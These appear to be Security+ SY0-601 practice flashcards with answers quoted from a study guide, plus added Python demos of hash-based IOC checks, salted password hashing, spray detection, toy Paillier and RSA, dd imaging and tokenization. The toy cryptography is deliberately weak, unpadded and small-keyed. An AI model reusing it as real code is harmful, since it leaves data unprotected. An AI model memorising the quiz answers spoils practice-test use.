An air gap ensures systems are not connected to the same network, but the scenario indicates the servers will be networked to deliver the cloud-based services. See Chapter 9.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 142-143). YCDA, LLC. Kindle Edition.

61
Q

As a Security Administrator, you receive an antivirus alert from a Server in your Network indicating one of the files has a Hash of known Malware. The file was pushed to the Server from the organization’s Patch Management System and is scheduled to be applied to the Server early the next morning. The antivirus software indicates that the file and Hash of the Malware are:

File: gcga_upgrade.exe
Hash: 518b571e26035d95e5e9232b4affbd84
Checking the logs of the patch management system, you see the following information:

Status Update Name Hash
Pushed gcga_upgrade.exe 518b571e26035d95e5e9232b4affbd84

Which of the following indicates what MOST likely occurred?

The file was infected after it was pushed out to the Server.

The file was embedded with Crypto-Malware before it was pushed to the Server.

The file was listed in the Patch Management System’s Blacklist.

The file was infected when the Patch Management System downloaded it.

A

The file was infected when the Patch Management System downloaded it.

Explanation:
Of the given choices, the file was most likely infected when the patch management system downloaded it, because the file name and hash are the same on the server as in the patch management system's log. Identical hashes mean identical bytes, so the malicious content was already present when the patch system recorded the file at push time. (A 32-hex-character hash like the one shown is MD5; matching a known-bad sample with it is still meaningful, but a current IOC feed should carry SHA-256 values as well.)

If the file had been infected after it was pushed out to the server, its hash on the server would differ from the one the patch management system recorded.
The scenario doesn’t indicate what type of infection the malware has, so it isn’t possible to tell if it is crypto-malware or another type of malware.
A blacklist blocks files so if the file were listed in the patch management system’s blacklist, the patch management system wouldn’t push it out to systems. See Chapter 10.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 143). YCDA, LLC. Kindle Edition.
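
The reasoning in this explanation, as an added example that is not from the study guide: hash the copy on the patch system and the copy on the server, compare the two, and only then consult the IOC list. The file bytes, the IOC entry and the temporary paths are constructed for the demo; the default algorithm is SHA-256, with MD5 available because that is what the alert in the question shows.

```python
"""Hash-based IOC matching for a pushed patch file (added example)."""
import hashlib
import os
import tempfile

INFECTED_AT_DOWNLOAD = "infected when the patch system downloaded it"
MODIFIED_AFTER_PUSH = "modified after it was pushed"
NO_MATCH = "no IOC match"


def hash_file(path, algorithm="sha256", chunk_size=1 << 20):
    """Stream the file so a large patch bundle never has to fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def diagnose(patch_system_hash, endpoint_hash, known_malware_hashes):
    """Same bytes on both systems plus an IOC hit means the bad file arrived with the download;
    a hash that no longer matches the patch system's record means it changed after the push."""
    if endpoint_hash != patch_system_hash:
        return MODIFIED_AFTER_PUSH
    if endpoint_hash in known_malware_hashes:
        return INFECTED_AT_DOWNLOAD
    return NO_MATCH


def run_demo(algorithm="sha256"):
    """Build the two copies of gcga_upgrade.exe, diagnose, tamper with the server copy, diagnose again."""
    payload = b"MZ\x90\x00constructed fake installer bytes"          # constructed, not real malware
    iocs = {hashlib.new(algorithm, payload).hexdigest()}            # constructed IOC entry
    workdir = tempfile.mkdtemp()
    on_patch_system = os.path.join(workdir, "repo", "gcga_upgrade.exe")
    on_server = os.path.join(workdir, "server", "gcga_upgrade.exe")
    for p in (on_patch_system, on_server):
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as fh:
            fh.write(payload)
    recorded = hash_file(on_patch_system, algorithm)     # what the patch system logged at push time
    first = diagnose(recorded, hash_file(on_server, algorithm), iocs)
    with open(on_server, "ab") as fh:                    # something alters the copy on the server
        fh.write(b"\x00appended after push")
    second = diagnose(recorded, hash_file(on_server, algorithm), iocs)
    return first, second


if __name__ == "__main__":
    print(run_demo("md5"))
```

The two verdicts returned by run_demo are the two branches of the explanation: the untouched server copy matches the patch system's record and the IOC list, while the appended copy no longer matches the record at all.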

62
Q

** An organization requested bids for a contract and asked companies to submit their bids via email. After winning the bid, Bizzfad realized it couldn’t meet the requirements of the contract. Bizzfad instead stated that it never submitted the bid. Which of the following would provide proof to the organization that Bizzfad did submit the bid, if it was used?

Digital Signature
Integrity
Repudiation
Encryption

A

Digital Signature

Explanation:
If Bizzfad submitted the bid via email using a digital signature, the signature would provide proof that Bizzfad submitted it. Digital signatures provide authentication (verification of who sent a message), non-repudiation (the sender cannot plausibly deny sending it, because only the holder of the private key could have produced the signature), and integrity (verification that the message wasn’t modified).

Integrity on its own only verifies that the message wasn’t modified; it says nothing about who sent it.
Repudiation is the act of denying having done something; it is what non-repudiation controls defend against, not a control or security goal in itself.
Encryption protects the confidentiality of data, but it doesn’t verify who sent it or provide non-repudiation. See Chapter 10.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 143). YCDA, LLC. Kindle Edition.

63
Q

** An application requires users to log on with passwords. The application developers want to store the passwords in such a way that it will thwart Rainbow Table attacks. Which of the following is the BEST solution?

Implement Salting
Implement Hashing
Implement Homomorphic Encryption
Implement Perfect Forward Secrecy

A

Implement Salting

Explanation:
Salting passwords is a common method of preventing rainbow table attacks.

Salting adds additional data to the password before hashing it.
Rainbow table attacks use precomputed tables of hashes of candidate passwords, so simply hashing the passwords (without a salt) is exactly what a rainbow table is built to defeat; a unique random salt per password makes every stored hash distinct and the precomputed table useless.
Homomorphic encryption is used to protect data stored in cloud environments; it allows data to remain encrypted while it is being processed.
Perfect forward secrecy is an encryption property: the system generates fresh, ephemeral keys for each session, so a later compromise of a long-term key does not expose past sessions. See Chapter 10.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 143-144). YCDA, LLC. Kindle Edition.
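
Salting as the developers in the question would implement it, as an added example that is not from the study guide. It contrasts a bare SHA-256 digest (the thing a rainbow table is precomputed against) with a per-user random salt fed to PBKDF2-HMAC-SHA256 via the standard library. The user names and passwords are constructed; the default iteration count of 600,000 follows current OWASP guidance for PBKDF2-HMAC-SHA256 and is a parameter so tests can run faster.

```python
"""Salted, iterated password hashing versus a bare hash (added example)."""
import hashlib
import hmac
import os

ITERATIONS = 600_000      # OWASP recommendation for PBKDF2-HMAC-SHA256 at time of writing
SALT_BYTES = 16


def unsalted_hash(password):
    """What a rainbow table targets: same password gives the same digest, on every site."""
    return hashlib.sha256(password.encode()).hexdigest()


def hash_password(password, iterations=ITERATIONS):
    """Fresh random salt per password; the stored record carries its own parameters."""
    salt = os.urandom(SALT_BYTES)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and parameters; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash record")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def demo(iterations=ITERATIONS):
    """Two users with the same (constructed) password: identical bare hashes, distinct salted ones."""
    shared = "correct horse battery"
    alice = hash_password(shared, iterations)
    bob = hash_password(shared, iterations)
    return {
        "unsalted_identical": unsalted_hash(shared) == unsalted_hash(shared),
        "salted_distinct": alice != bob,
        "alice_accepts_own": verify_password(shared, alice),
        "alice_rejects_wrong": verify_password("wrong password", alice),
        "bob_rejects_alice_record_swap": verify_password(shared + "!", bob),
    }


if __name__ == "__main__":
    print(demo())
```

A practitioner would reach for hashlib.scrypt or an Argon2 binding before PBKDF2 when they are available; the record format above is the part that matters for the question, since the salt stored beside the hash is what forces an attacker to start over for every user instead of looking results up in a table.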

64
Q

** Your SIEM system sent an alert related to multiple failed logins. Reviewing the logs, you notice login failures for about 100 different accounts. The logs then show a second round of login failures against the same accounts starting about three hours after the first login failure. Which of the following BEST describes this activity?

Brute Force Attack
Dictionary Attack
Spraying Attack
Account Lockout Attack

A

Spraying Attack

Explanation:
This describes a password spraying attack. The security information and event management (SIEM) logs show the attacker looping through a long list of accounts, trying one password against each account in turn, then returning for another round with the next password.

A brute force attack attempts all possible character combinations for a password, and a dictionary attack works through a list of words trying to discover the correct password.
However, both of those concentrate many guesses on a single account; neither loops through a list of user accounts.
A spraying attack is designed to stay under an account lockout policy: each account sees only one or two failures per round, and the attacker waits out the lockout observation window before the next round (the three-hour gap here).
An account lockout attack isn’t relevant in this scenario. See Chapter 10.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 144). YCDA, LLC. Kindle Edition.
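
The detection logic behind this answer, as an added example that is not from the study guide: group failed logins by source, and label a source as spraying when it touches many accounts with only a few failures each, or as brute force when it hammers one account. The log line format, IP addresses, account names and thresholds are all constructed or assumed; the constructed log reproduces the question (about 100 accounts, a second round three hours later) plus a brute-force source and a benign fat-fingered user for contrast.

```python
"""Telling password spraying apart from brute force in SIEM auth logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# constructed log format: 2024-03-04T08:00:00Z auth FAIL user=alice src=203.0.113.7
LINE = re.compile(r"^(?P<ts>\S+) auth FAIL user=(?P<user>\S+) src=(?P<src>\S+)$")


def parse(lines):
    """Return (timestamp, user, source) tuples for lines that are auth failures."""
    events = []
    for line in lines:
        m = LINE.match(line)
        if m:
            ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
            events.append((ts, m["user"], m["src"]))
    return events


def classify(lines, account_threshold=20, tries_per_account=3):
    """Map each suspicious source to a label. Thresholds are assumptions; tune per environment."""
    per_src = defaultdict(lambda: defaultdict(list))
    for ts, user, src in parse(lines):
        per_src[src][user].append(ts)
    verdicts = {}
    for src, accounts in per_src.items():
        distinct = len(accounts)
        busiest = max(len(stamps) for stamps in accounts.values())
        if distinct >= account_threshold and busiest <= tries_per_account:
            verdicts[src] = "password spraying"      # wide and shallow: stays under lockout
        elif busiest >= account_threshold:
            verdicts[src] = "brute force"            # narrow and deep: one account, many guesses
    return verdicts


def round_spacing_seconds(lines, src):
    """Smallest gap between repeat attempts on the same account from src.
    A sprayer's gap sits just beyond the lockout observation window."""
    stamps = defaultdict(list)
    for ts, user, s in parse(lines):
        if s == src:
            stamps[user].append(ts)
    gaps = [b - a for v in stamps.values() for a, b in zip(sorted(v), sorted(v)[1:])]
    return min(gaps).total_seconds() if gaps else None


def constructed_logs():
    """Constructed sample: a sprayer, a brute-forcer, and a legitimate user who mistyped twice."""
    base = datetime(2024, 3, 4, 8, 0, 0)
    lines = []
    for round_no in (0, 1):                                   # two rounds, three hours apart
        for i in range(100):
            ts = base + timedelta(hours=3 * round_no, seconds=i)
            lines.append(f"{ts.isoformat()}Z auth FAIL user=user{i:03d} src=198.51.100.23")
    for i in range(50):                                        # one account, 50 guesses
        ts = base + timedelta(minutes=10, seconds=i)
        lines.append(f"{ts.isoformat()}Z auth FAIL user=admin src=203.0.113.9")
    for minute in (5, 6):                                      # benign noise
        ts = base + timedelta(minutes=minute)
        lines.append(f"{ts.isoformat()}Z auth FAIL user=bart src=192.0.2.10")
    return lines


if __name__ == "__main__":
    logs = constructed_logs()
    print(classify(logs))
    print(round_spacing_seconds(logs, "198.51.100.23"))
```

Per-account failure counts alone would never fire on the sprayer, which is why this rule pivots on the source and counts distinct accounts; the round spacing is the value to compare against your lockout policy's observation window when you tune the alert.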

65
Q

** Your organization maintains a data center to store data. Management has decided to move a large amount of financial data into Cloud Storage to reduce costs with the data center. This data is regularly accessed and sometimes manipulated by employees, customers, and vendors around the world. Management has mandated that the data always needs to be Encrypted while in the Cloud. Which of the following is the BEST choice to meet these requirements?

Symmetric Encryption
Asymmetric Encryption
Homomorphic Encryption
Steganography Encryption

A

Homomorphic Encryption

Explanation:
Homomorphic encryption allows data to be accessed and manipulated while it is encrypted.

Symmetric and asymmetric encryption methods require the data to be decrypted before it is manipulated.
Steganography isn’t truly encryption, but instead it simply hides data within data. See Chapter 10.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 144). YCDA, LLC. Kindle Edition.
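
What "manipulated while encrypted" means in practice, as an added example that is not from the study guide: a toy Paillier cryptosystem, which is additively homomorphic, so a cloud service holding only ciphertexts can total the figures and multiply by a public constant, and only the key holder can read the result. Keys are built from small Mersenne primes purely so the arithmetic is visible; the balances are constructed. Real deployments use 2048-bit moduli and a vetted library, and note the caveat that Paillier is partially homomorphic (addition and scaling only); multiplying two ciphertexts' plaintexts needs a fully homomorphic scheme.

```python
"""Toy Paillier: add and scale numbers without decrypting them (added example)."""
import math
import secrets


def keygen(p, q):
    """Public key n; private key (lambda, mu). p and q are distinct primes of similar size."""
    n = p * q
    lam = (p - 1) * (q - 1) // math.gcd(p - 1, q - 1)     # lcm(p-1, q-1)
    mu = pow(lam, -1, n)        # with g = n + 1, L(g^lam mod n^2) == lam, so mu = lam^-1 mod n
    return n, (lam, mu)


def encrypt(n, m):
    """c = (1 + n)^m * r^n mod n^2 with a fresh random r, so equal plaintexts give different ciphertexts."""
    n2 = n * n
    while True:
        r = secrets.randbelow(n - 1) + 1
        if math.gcd(r, n) == 1:
            break
    return pow(n + 1, m, n2) * pow(r, n, n2) % n2


def decrypt(n, priv, c):
    lam, mu = priv
    n2 = n * n
    L = (pow(c, lam, n2) - 1) // n       # exact: c^lam == 1 + m*lam*n (mod n^2)
    return L * mu % n


def add(n, c1, c2):
    """E(a) * E(b) mod n^2 == E(a + b): the cloud adds without seeing a or b."""
    return c1 * c2 % (n * n)


def scale(n, c, k):
    """E(a)^k mod n^2 == E(k * a): multiply by a public constant."""
    return pow(c, k, n * n)


# constructed toy key from Mersenne primes 2^61-1 and 2^89-1
N, PRIV = keygen(2**61 - 1, 2**89 - 1)


def demo():
    """Three parties encrypt balances; the 'cloud' sums them and triples one; the key holder decrypts."""
    balances = [1250, 3075, 980]                  # constructed plaintexts
    ciphertexts = [encrypt(N, b) for b in balances]
    total_ct = ciphertexts[0]
    for c in ciphertexts[1:]:
        total_ct = add(N, total_ct, c)
    tripled_ct = scale(N, ciphertexts[0], 3)
    return decrypt(N, PRIV, total_ct), decrypt(N, PRIV, tripled_ct)


if __name__ == "__main__":
    print(demo())
```

Because encryption is randomized, the cloud also cannot tell when two submitted balances are equal; that property is what makes the scheme usable for the shared financial data in the question, where employees, customers and vendors all contribute values.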

66
Q

Lisa and Bart need to exchange emails over the Internet using an unsecured channel. These emails need to provide non-repudiation. They decide to use Certificates on each of their computers. What would they use to sign their Certificates?

CRL
OCSP
CSR
CA
DSA

A

CA (Certificate Authority)

Explanation:
A certificate authority (CA) manages certificates and would sign certificates issued to users. Note that non-repudiation would be provided with digital signatures and each user would need a certificate assigned to them that they would use to create the digital signatures.

A certificate revocation list (CRL) is a list of revoked certificates.
Online Certificate Status Protocol (OCSP) is an alternative to a CRL and provides a real-time response indicating the validity of a certificate.
The certificate signing request (CSR) is used to request a certificate.
The Digital Signature Algorithm (DSA) is one algorithm a CA may use when it signs a certificate, and Lisa and Bart would use digital signatures (created with their own private keys and backed by their certificates) to sign their emails. But the question asks what signs their certificates, and that is the CA; the algorithm is the tool the CA uses, not the signer. See Chapter 10.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 145). YCDA, LLC. Kindle Edition.
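
Both this question and the Bizzfad bid question above come down to the same mechanism, shown here as one added example that is not from the study guide: a signature made with a private key verifies only under the matching public key (non-repudiation), fails on a changed message (integrity), and the CA is the party that signs the certificate binding a name to that public key. It uses textbook RSA with keys built from Mersenne primes and no padding scheme, which illustrates the mechanism only and must never be used for real signatures; the names, the bid text and the "rogue CA" are constructed.

```python
"""Toy RSA signatures plus a one-level CA chain of trust (added example)."""
import hashlib

E = 65537


def make_keypair(p, q, e=E):
    """Return (public, private) as ((n, e), (n, d)); p and q must be distinct primes."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)                 # modular inverse, Python 3.8+
    return (n, e), (n, d)


def _digest_int(data, n):
    """SHA-256 of the message as an integer in Z_n (real schemes pad instead of reducing)."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(private_key, data):
    n, d = private_key
    return pow(_digest_int(data, n), d, n)


def verify(public_key, data, signature):
    n, e = public_key
    return pow(signature, e, n) == _digest_int(data, n)


def issue_certificate(ca_private_key, subject, subject_public_key):
    """The CA's job: sign the binding between a subject name and the subject's public key."""
    tbs = f"{subject}|{subject_public_key[0]}|{subject_public_key[1]}".encode()
    return {"subject": subject, "public_key": subject_public_key,
            "tbs": tbs, "ca_signature": sign(ca_private_key, tbs)}


def verify_certificate(ca_public_key, cert):
    return verify(ca_public_key, cert["tbs"], cert["ca_signature"])


def verify_signed_email(ca_public_key, cert, body, signature):
    """Relying party: trust the certificate via the CA first, then check the message signature."""
    return verify_certificate(ca_public_key, cert) and verify(cert["public_key"], body, signature)


# constructed key material from Mersenne primes 2^61-1, 2^89-1, 2^107-1, 2^127-1
CA_PUB, CA_PRIV = make_keypair(2**89 - 1, 2**107 - 1)
LISA_PUB, LISA_PRIV = make_keypair(2**61 - 1, 2**127 - 1)
ROGUE_PUB, ROGUE_PRIV = make_keypair(2**61 - 1, 2**89 - 1)

LISA_CERT = issue_certificate(CA_PRIV, "lisa@example.com", LISA_PUB)
BID = b"Bizzfad bids 1,200,000 for the contract"      # constructed message


def demo():
    """The four cases a relying party meets: genuine, tampered, forged, and wrongly certified."""
    sig = sign(LISA_PRIV, BID)
    rogue_cert = issue_certificate(ROGUE_PRIV, "lisa@example.com", LISA_PUB)
    return {
        "genuine": verify_signed_email(CA_PUB, LISA_CERT, BID, sig),
        "tampered_body": verify_signed_email(CA_PUB, LISA_CERT, BID + b"0", sig),
        "forged_with_other_key": verify_signed_email(CA_PUB, LISA_CERT, BID, sign(ROGUE_PRIV, BID)),
        "cert_from_untrusted_ca": verify_signed_email(CA_PUB, rogue_cert, BID, sig),
    }


if __name__ == "__main__":
    print(demo())
```

The non-repudiation argument is the "forged_with_other_key" case: nobody without Lisa's private key can produce a value that verifies under the public key her CA-signed certificate vouches for, so a bid carrying such a signature cannot credibly be disowned. Revocation (CRL or OCSP) would add a check that the certificate is still valid at verification time; it is deliberately left out here.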

67
Q

An Administrator is installing a Certificate with a Private Key on a Server. Which of the following Certificate types is he most likely installing?

DER
P12
CER
P7B

A

P12 (PKCS#12)

Explanation:
P12 (PKCS #12) files are password-protected containers that bundle a certificate with its private key (and usually the issuing chain), and they are the usual way to install a private key on a server.

A Distinguished Encoding Rules (DER)–based certificate is a binary-encoded file. The .cer extension only says "this is a certificate": a .cer file may hold either binary DER or Base64 (PEM-style) text, which is why the study guide describes CER as ASCII-encoded; note that Canonical Encoding Rules (CER) in the ASN.1 standard is itself a binary encoding, so treat the extension as a hint, not a format guarantee.
Either way, DER and CER describe the encoding, not the content (such as a private key). A P12 file is itself DER-encoded ASN.1, but not all DER files include private keys.
A P7B (PKCS #7) file carries certificates (typically a chain) to share public keys and never includes a private key. See Chapter 10.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 145). YCDA, LLC. Kindle Edition.

68
Q

Your organization is negotiating with an outside vendor to host Cloud-based resources. Management wants to ensure the vendor commits to returning the systems to full operation after an outage within a certain time frame. Which of the following is the organization MOST likely negotiating?

MTTR
NDA
SLA
DLP

A

SLA (Service Level Agreement)

Explanation:
A service level agreement (SLA) is an agreement between a company and a vendor that stipulates performance expectations, including returning a system to full operation within a specific timeframe.

The mean time to repair (MTTR) identifies the average (the arithmetic mean) time it takes to restore a failed system, but it does not provide a guarantee that the vendor will restore the system within the MTTR every time.
A non-disclosure agreement (NDA) ensures that individuals do not share proprietary data with others.
A data loss prevention (DLP) device typically monitors outgoing traffic to prevent confidential information from getting outside the organization. See Chapter 11.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 145). YCDA, LLC. Kindle Edition.

69
Q

Your organization has hired outside consultants to evaluate forensic processes used by internal Security specialists. The consultants are evaluating the tools and processes used for Digital Forensics to identify any variations that may exist. Which of the following BEST describes what these consultants are performing?

AUP
NDA
SLA
MSA

A

MSA (Measurement Systems Analysis)

Explanation:
A measurement systems analysis (MSA) evaluates the processes and tools used to make measurements.

An acceptable use policy (AUP) informs users of company expectations when they use computer systems and networks, and it defines acceptable rules of behavior.
A non-disclosure agreement (NDA) ensures that individuals do not share proprietary data with others.
A service level agreement (SLA) is an agreement between a company and a vendor that stipulates performance expectations, such as minimum uptime and maximum downtime levels. See Chapter 11.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 145-146). YCDA, LLC. Kindle Edition.

70
Q

Your organization recently developed an Incident Response Policy and is beginning to implement an Incident Response Plan. Which of the following items is the FIRST step in an Incident Response Process?

Preparation
Identification
Containment
Eradication

A

Preparation

Explanation:
The first step in an incident response process is preparation. When a potential incident occurs, the next step is identification.

If the event is a security incident, the next step is containment to isolate the incident and limit the damage.
Next, personnel take steps to eradicate all elements that caused the incident, such as malware or compromised accounts.
The last two steps in the incident response process are recovery and lessons learned. See Chapter 11.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 146). YCDA, LLC. Kindle Edition.

71
Q

Security Administrators have been responding to an increasing number of incident alerts, making it harder for them to respond to each promptly. Management wants to implement a solution that will automate the response of some of these incidents without requiring real-time involvement by Security Administrators. Which of the following will BEST meet this need?

SOAR
DLP
STIX
TAXII

A

SOAR (Security Orchestration, Automation, and Response)

Explanation:
A Security Orchestration, Automation, and Response (SOAR) tool can be configured with runbooks (playbooks) that carry out the response to these incidents automatically, and it is the best choice of the available answers.

A data loss prevention (DLP) device typically monitors outgoing traffic to prevent confidential information from getting outside the organization. While a SOAR runbook may include DLP action, a SOAR runbook can do much more.
Structured Threat Information eXpression (STIX) defines standardized language used to share cyber threat information.
TAXII (Trusted Automated eXchange of Indicator Information) defines a set of services and message exchanges that can be used to share information. STIX identifies what to share and TAXII identifies how to share it. See Chapter 11.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 146). YCDA, LLC. Kindle Edition.

72
Q

Security Administrators have isolated a Linux Server after a successful attack. A forensic analyst is tasked with creating an image of the hard drive of this system for analysis. Which of the following will the analyst MOST likely use to create the image?

tcpreplay
chmod
dd
Cuckoo

A

dd

Explanation:
The dd command is available on Linux systems, and it is used to copy disks and files for analysis. As an example, dd if=/dev/sda2 of=sd2disk.img creates a bit-for-bit image of the /dev/sda2 partition without modifying the original. In practice the analyst attaches the source through a write blocker (or at least never mounts it read-write), adds conv=noerror,sync so an unreadable sector does not abort the copy, and hashes both the source and the image afterwards to prove they match. None of the other choices creates an image of a drive.

Tcpreplay is a suite of utilities used to edit packet captures and resend them, and it includes the tcpreplay command.
The chmod (short for change mode) command is used to change permissions on Linux systems.
Cuckoo is an open source malware analysis system. It analyzes malware within a sandbox environment. See Chapter 11.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 146-147). YCDA, LLC. Kindle Edition.

73
Q

A forensic expert is preparing to analyze a Hard Drive. Which of the following should the expert do FIRST?

Capture an image of the disk with dd.
Identify the Order of Volatility
Copy the contents of memory with memdump.
Create a Chain of Custody document.

A

Capture an image of the disk with dd.

Explanation:
Before analyzing a hard drive, a forensic expert should capture an image of the hard drive and then analyze the image. The dd (short for data duplicator) command-line tool can be used to create an image of a disk without modifying it. This protects the original disk from accidental modifications and preserves it as usable evidence.

While not available as a possible answer, a hash of the original drive should be created before capturing an image.
The order of volatility identifies which data is most volatile (such as cache) and which is least volatile (such as hard drives).
Although the memdump command is used to copy the contents of memory, this scenario is focused on a hard drive.
A chain of custody document should be created when evidence is first collected. See Chapter 11.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 147). YCDA, LLC. Kindle Edition.
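
The acquisition sequence from the two dd questions above (hash the original, image it with dd, hash the image, compare), as one added example that is not from the study guide. The "disk" is a constructed file; on a real system the source would be a block device such as /dev/sda2 behind a hardware write blocker and dd would run as root. The dd invocation itself is the real command; if dd is not on PATH the copy falls back to a plain Python chunked copy so the hashing logic still runs. One caveat the example is built around: conv=sync pads short reads with zeros, so the block size must divide the device size or the image's hash will not match the source's.

```python
"""Imaging a disk with dd and proving the image matches the original (added example)."""
import hashlib
import os
import shutil
import subprocess
import tempfile


def sha256_of(path, chunk_size=1 << 20):
    """Stream the file; evidence images are far larger than RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def image_disk(source, image, block_size=4096):
    """Equivalent of: dd if=<source> of=<image> bs=4096 conv=noerror,sync
    noerror keeps copying past unreadable blocks; sync pads those blocks with zeros so
    offsets in the image still line up with the source. The dd progress summary on
    stderr is discarded here; keep it in a real acquisition log."""
    if shutil.which("dd"):
        subprocess.run(
            ["dd", f"if={source}", f"of={image}", f"bs={block_size}", "conv=noerror,sync"],
            check=True, stderr=subprocess.DEVNULL,
        )
    else:
        # portability fallback for the demo only; not a forensic copy
        with open(source, "rb") as src, open(image, "wb") as dst:
            shutil.copyfileobj(src, dst, block_size)
    return image


def acquire(source, image):
    """Order matters: hash the original first, image it, then hash the image.
    Both values belong in the chain-of-custody record."""
    before = sha256_of(source)
    image_disk(source, image)
    after = sha256_of(image)
    return {"source_sha256": before, "image_sha256": after, "verified": before == after}


def make_constructed_disk(path, blocks=64, block_size=4096):
    """Constructed stand-in for a partition: a whole number of blocks, as a real device would be."""
    with open(path, "wb") as fh:
        for i in range(blocks):
            fh.write(bytes([i % 256]) * block_size)
    return path


def demo():
    """Acquire a constructed disk, then show that altering one byte of the image breaks verification."""
    workdir = tempfile.mkdtemp()
    disk = make_constructed_disk(os.path.join(workdir, "sda2.bin"))
    image = os.path.join(workdir, "sd2disk.img")
    result = acquire(disk, image)
    with open(image, "r+b") as fh:        # an analyst's slip, or tampering: one byte changes
        fh.seek(4096)
        fh.write(b"\xff")
    still_matches = sha256_of(image) == result["image_sha256"]
    return result["verified"], still_matches


if __name__ == "__main__":
    print(demo())
```

Analysis then runs against the image (or a working copy of it), never the original; re-hashing the image before and after each session is how you show that what you examined is what you acquired.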

74
Q

** Your company hosts an e-commerce site that sells renewable subscriptions for services. Customers can choose to renew their subscription monthly or annually automatically. However, management doesn’t want to store customer credit card information on any database or system managed by the company. Which of the following can be used instead?

Pseudo-anonymization
Tokenization
Data minimization
Anonymization

A

Tokenization

Explanation:
Tokenization is the best choice. It stores a token created by the credit card processor instead of the credit card number, and this token can be used to make charges.

Pseudo-anonymization (pseudonymization) replaces data with artificial identifiers, but the process can be reversed by whoever holds the mapping.
Data anonymization modifies data to protect the privacy of individuals by either removing all Personally Identifiable Information or encrypting it.
Data minimization is a principle requiring organizations to limit the data they collect and use. See Chapter 11.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 147). YCDA, LLC. Kindle Edition.
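
How a token keeps the card number out of the merchant's systems, as an added example that is not from the study guide. The vault is an in-memory dictionary standing in for the payment processor, its charge method is a stub of the processor's API, and the card number is the standard "4111 1111 1111 1111" test PAN; the customer and plan names are constructed. The token is random rather than derived from the card, which is the point: unlike pseudonymization, nothing on the merchant's side can be reversed into the PAN.

```python
"""A minimal token vault: the merchant keeps a token, the processor keeps the card (added example)."""
import secrets


def luhn_ok(pan):
    """Checksum every card number carries; rejects typos before the processor is called."""
    digits = [int(c) for c in pan if c.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return len(digits) >= 13 and total % 10 == 0


class ProcessorVault:
    """Runs at the payment processor, inside PCI DSS scope. Stand-in for the real service."""

    def __init__(self):
        self._pan_by_token = {}

    def tokenize(self, pan):
        if not luhn_ok(pan):
            raise ValueError("invalid card number")
        token = "tok_" + secrets.token_hex(16)     # random: no key or math relates it to the PAN
        self._pan_by_token[token] = pan
        return token, pan[-4:]

    def charge(self, token, amount):
        pan = self._pan_by_token.get(token)
        if pan is None:
            raise KeyError("unknown token")
        return {"status": "approved", "amount": amount, "last4": pan[-4:]}


class MerchantDB:
    """What the e-commerce site stores: the token and last four for display, never the PAN."""

    def __init__(self):
        self.subscriptions = {}

    def enroll(self, customer, token, last4, plan):
        self.subscriptions[customer] = {"token": token, "last4": last4, "plan": plan}

    def holds(self, pan):
        return any(pan in str(row) for row in self.subscriptions.values())


def demo():
    """Enroll a customer, then run a renewal charge using only what the merchant stored."""
    vault = ProcessorVault()
    merchant = MerchantDB()
    pan = "4111111111111111"                       # standard test PAN, constructed customer
    token, last4 = vault.tokenize(pan)
    merchant.enroll("customer-1", token, last4, "monthly")
    stored = merchant.subscriptions["customer-1"]
    receipt = vault.charge(stored["token"], "9.99")
    return {"merchant_holds_pan": merchant.holds(pan), "renewal": receipt, "last4": last4}


if __name__ == "__main__":
    print(demo())
```

A breach of the merchant database in this design yields tokens that only this processor will honour for this merchant, which is why tokenization, not encryption on the merchant's own servers, is what takes the renewal database out of scope for storing cardholder data.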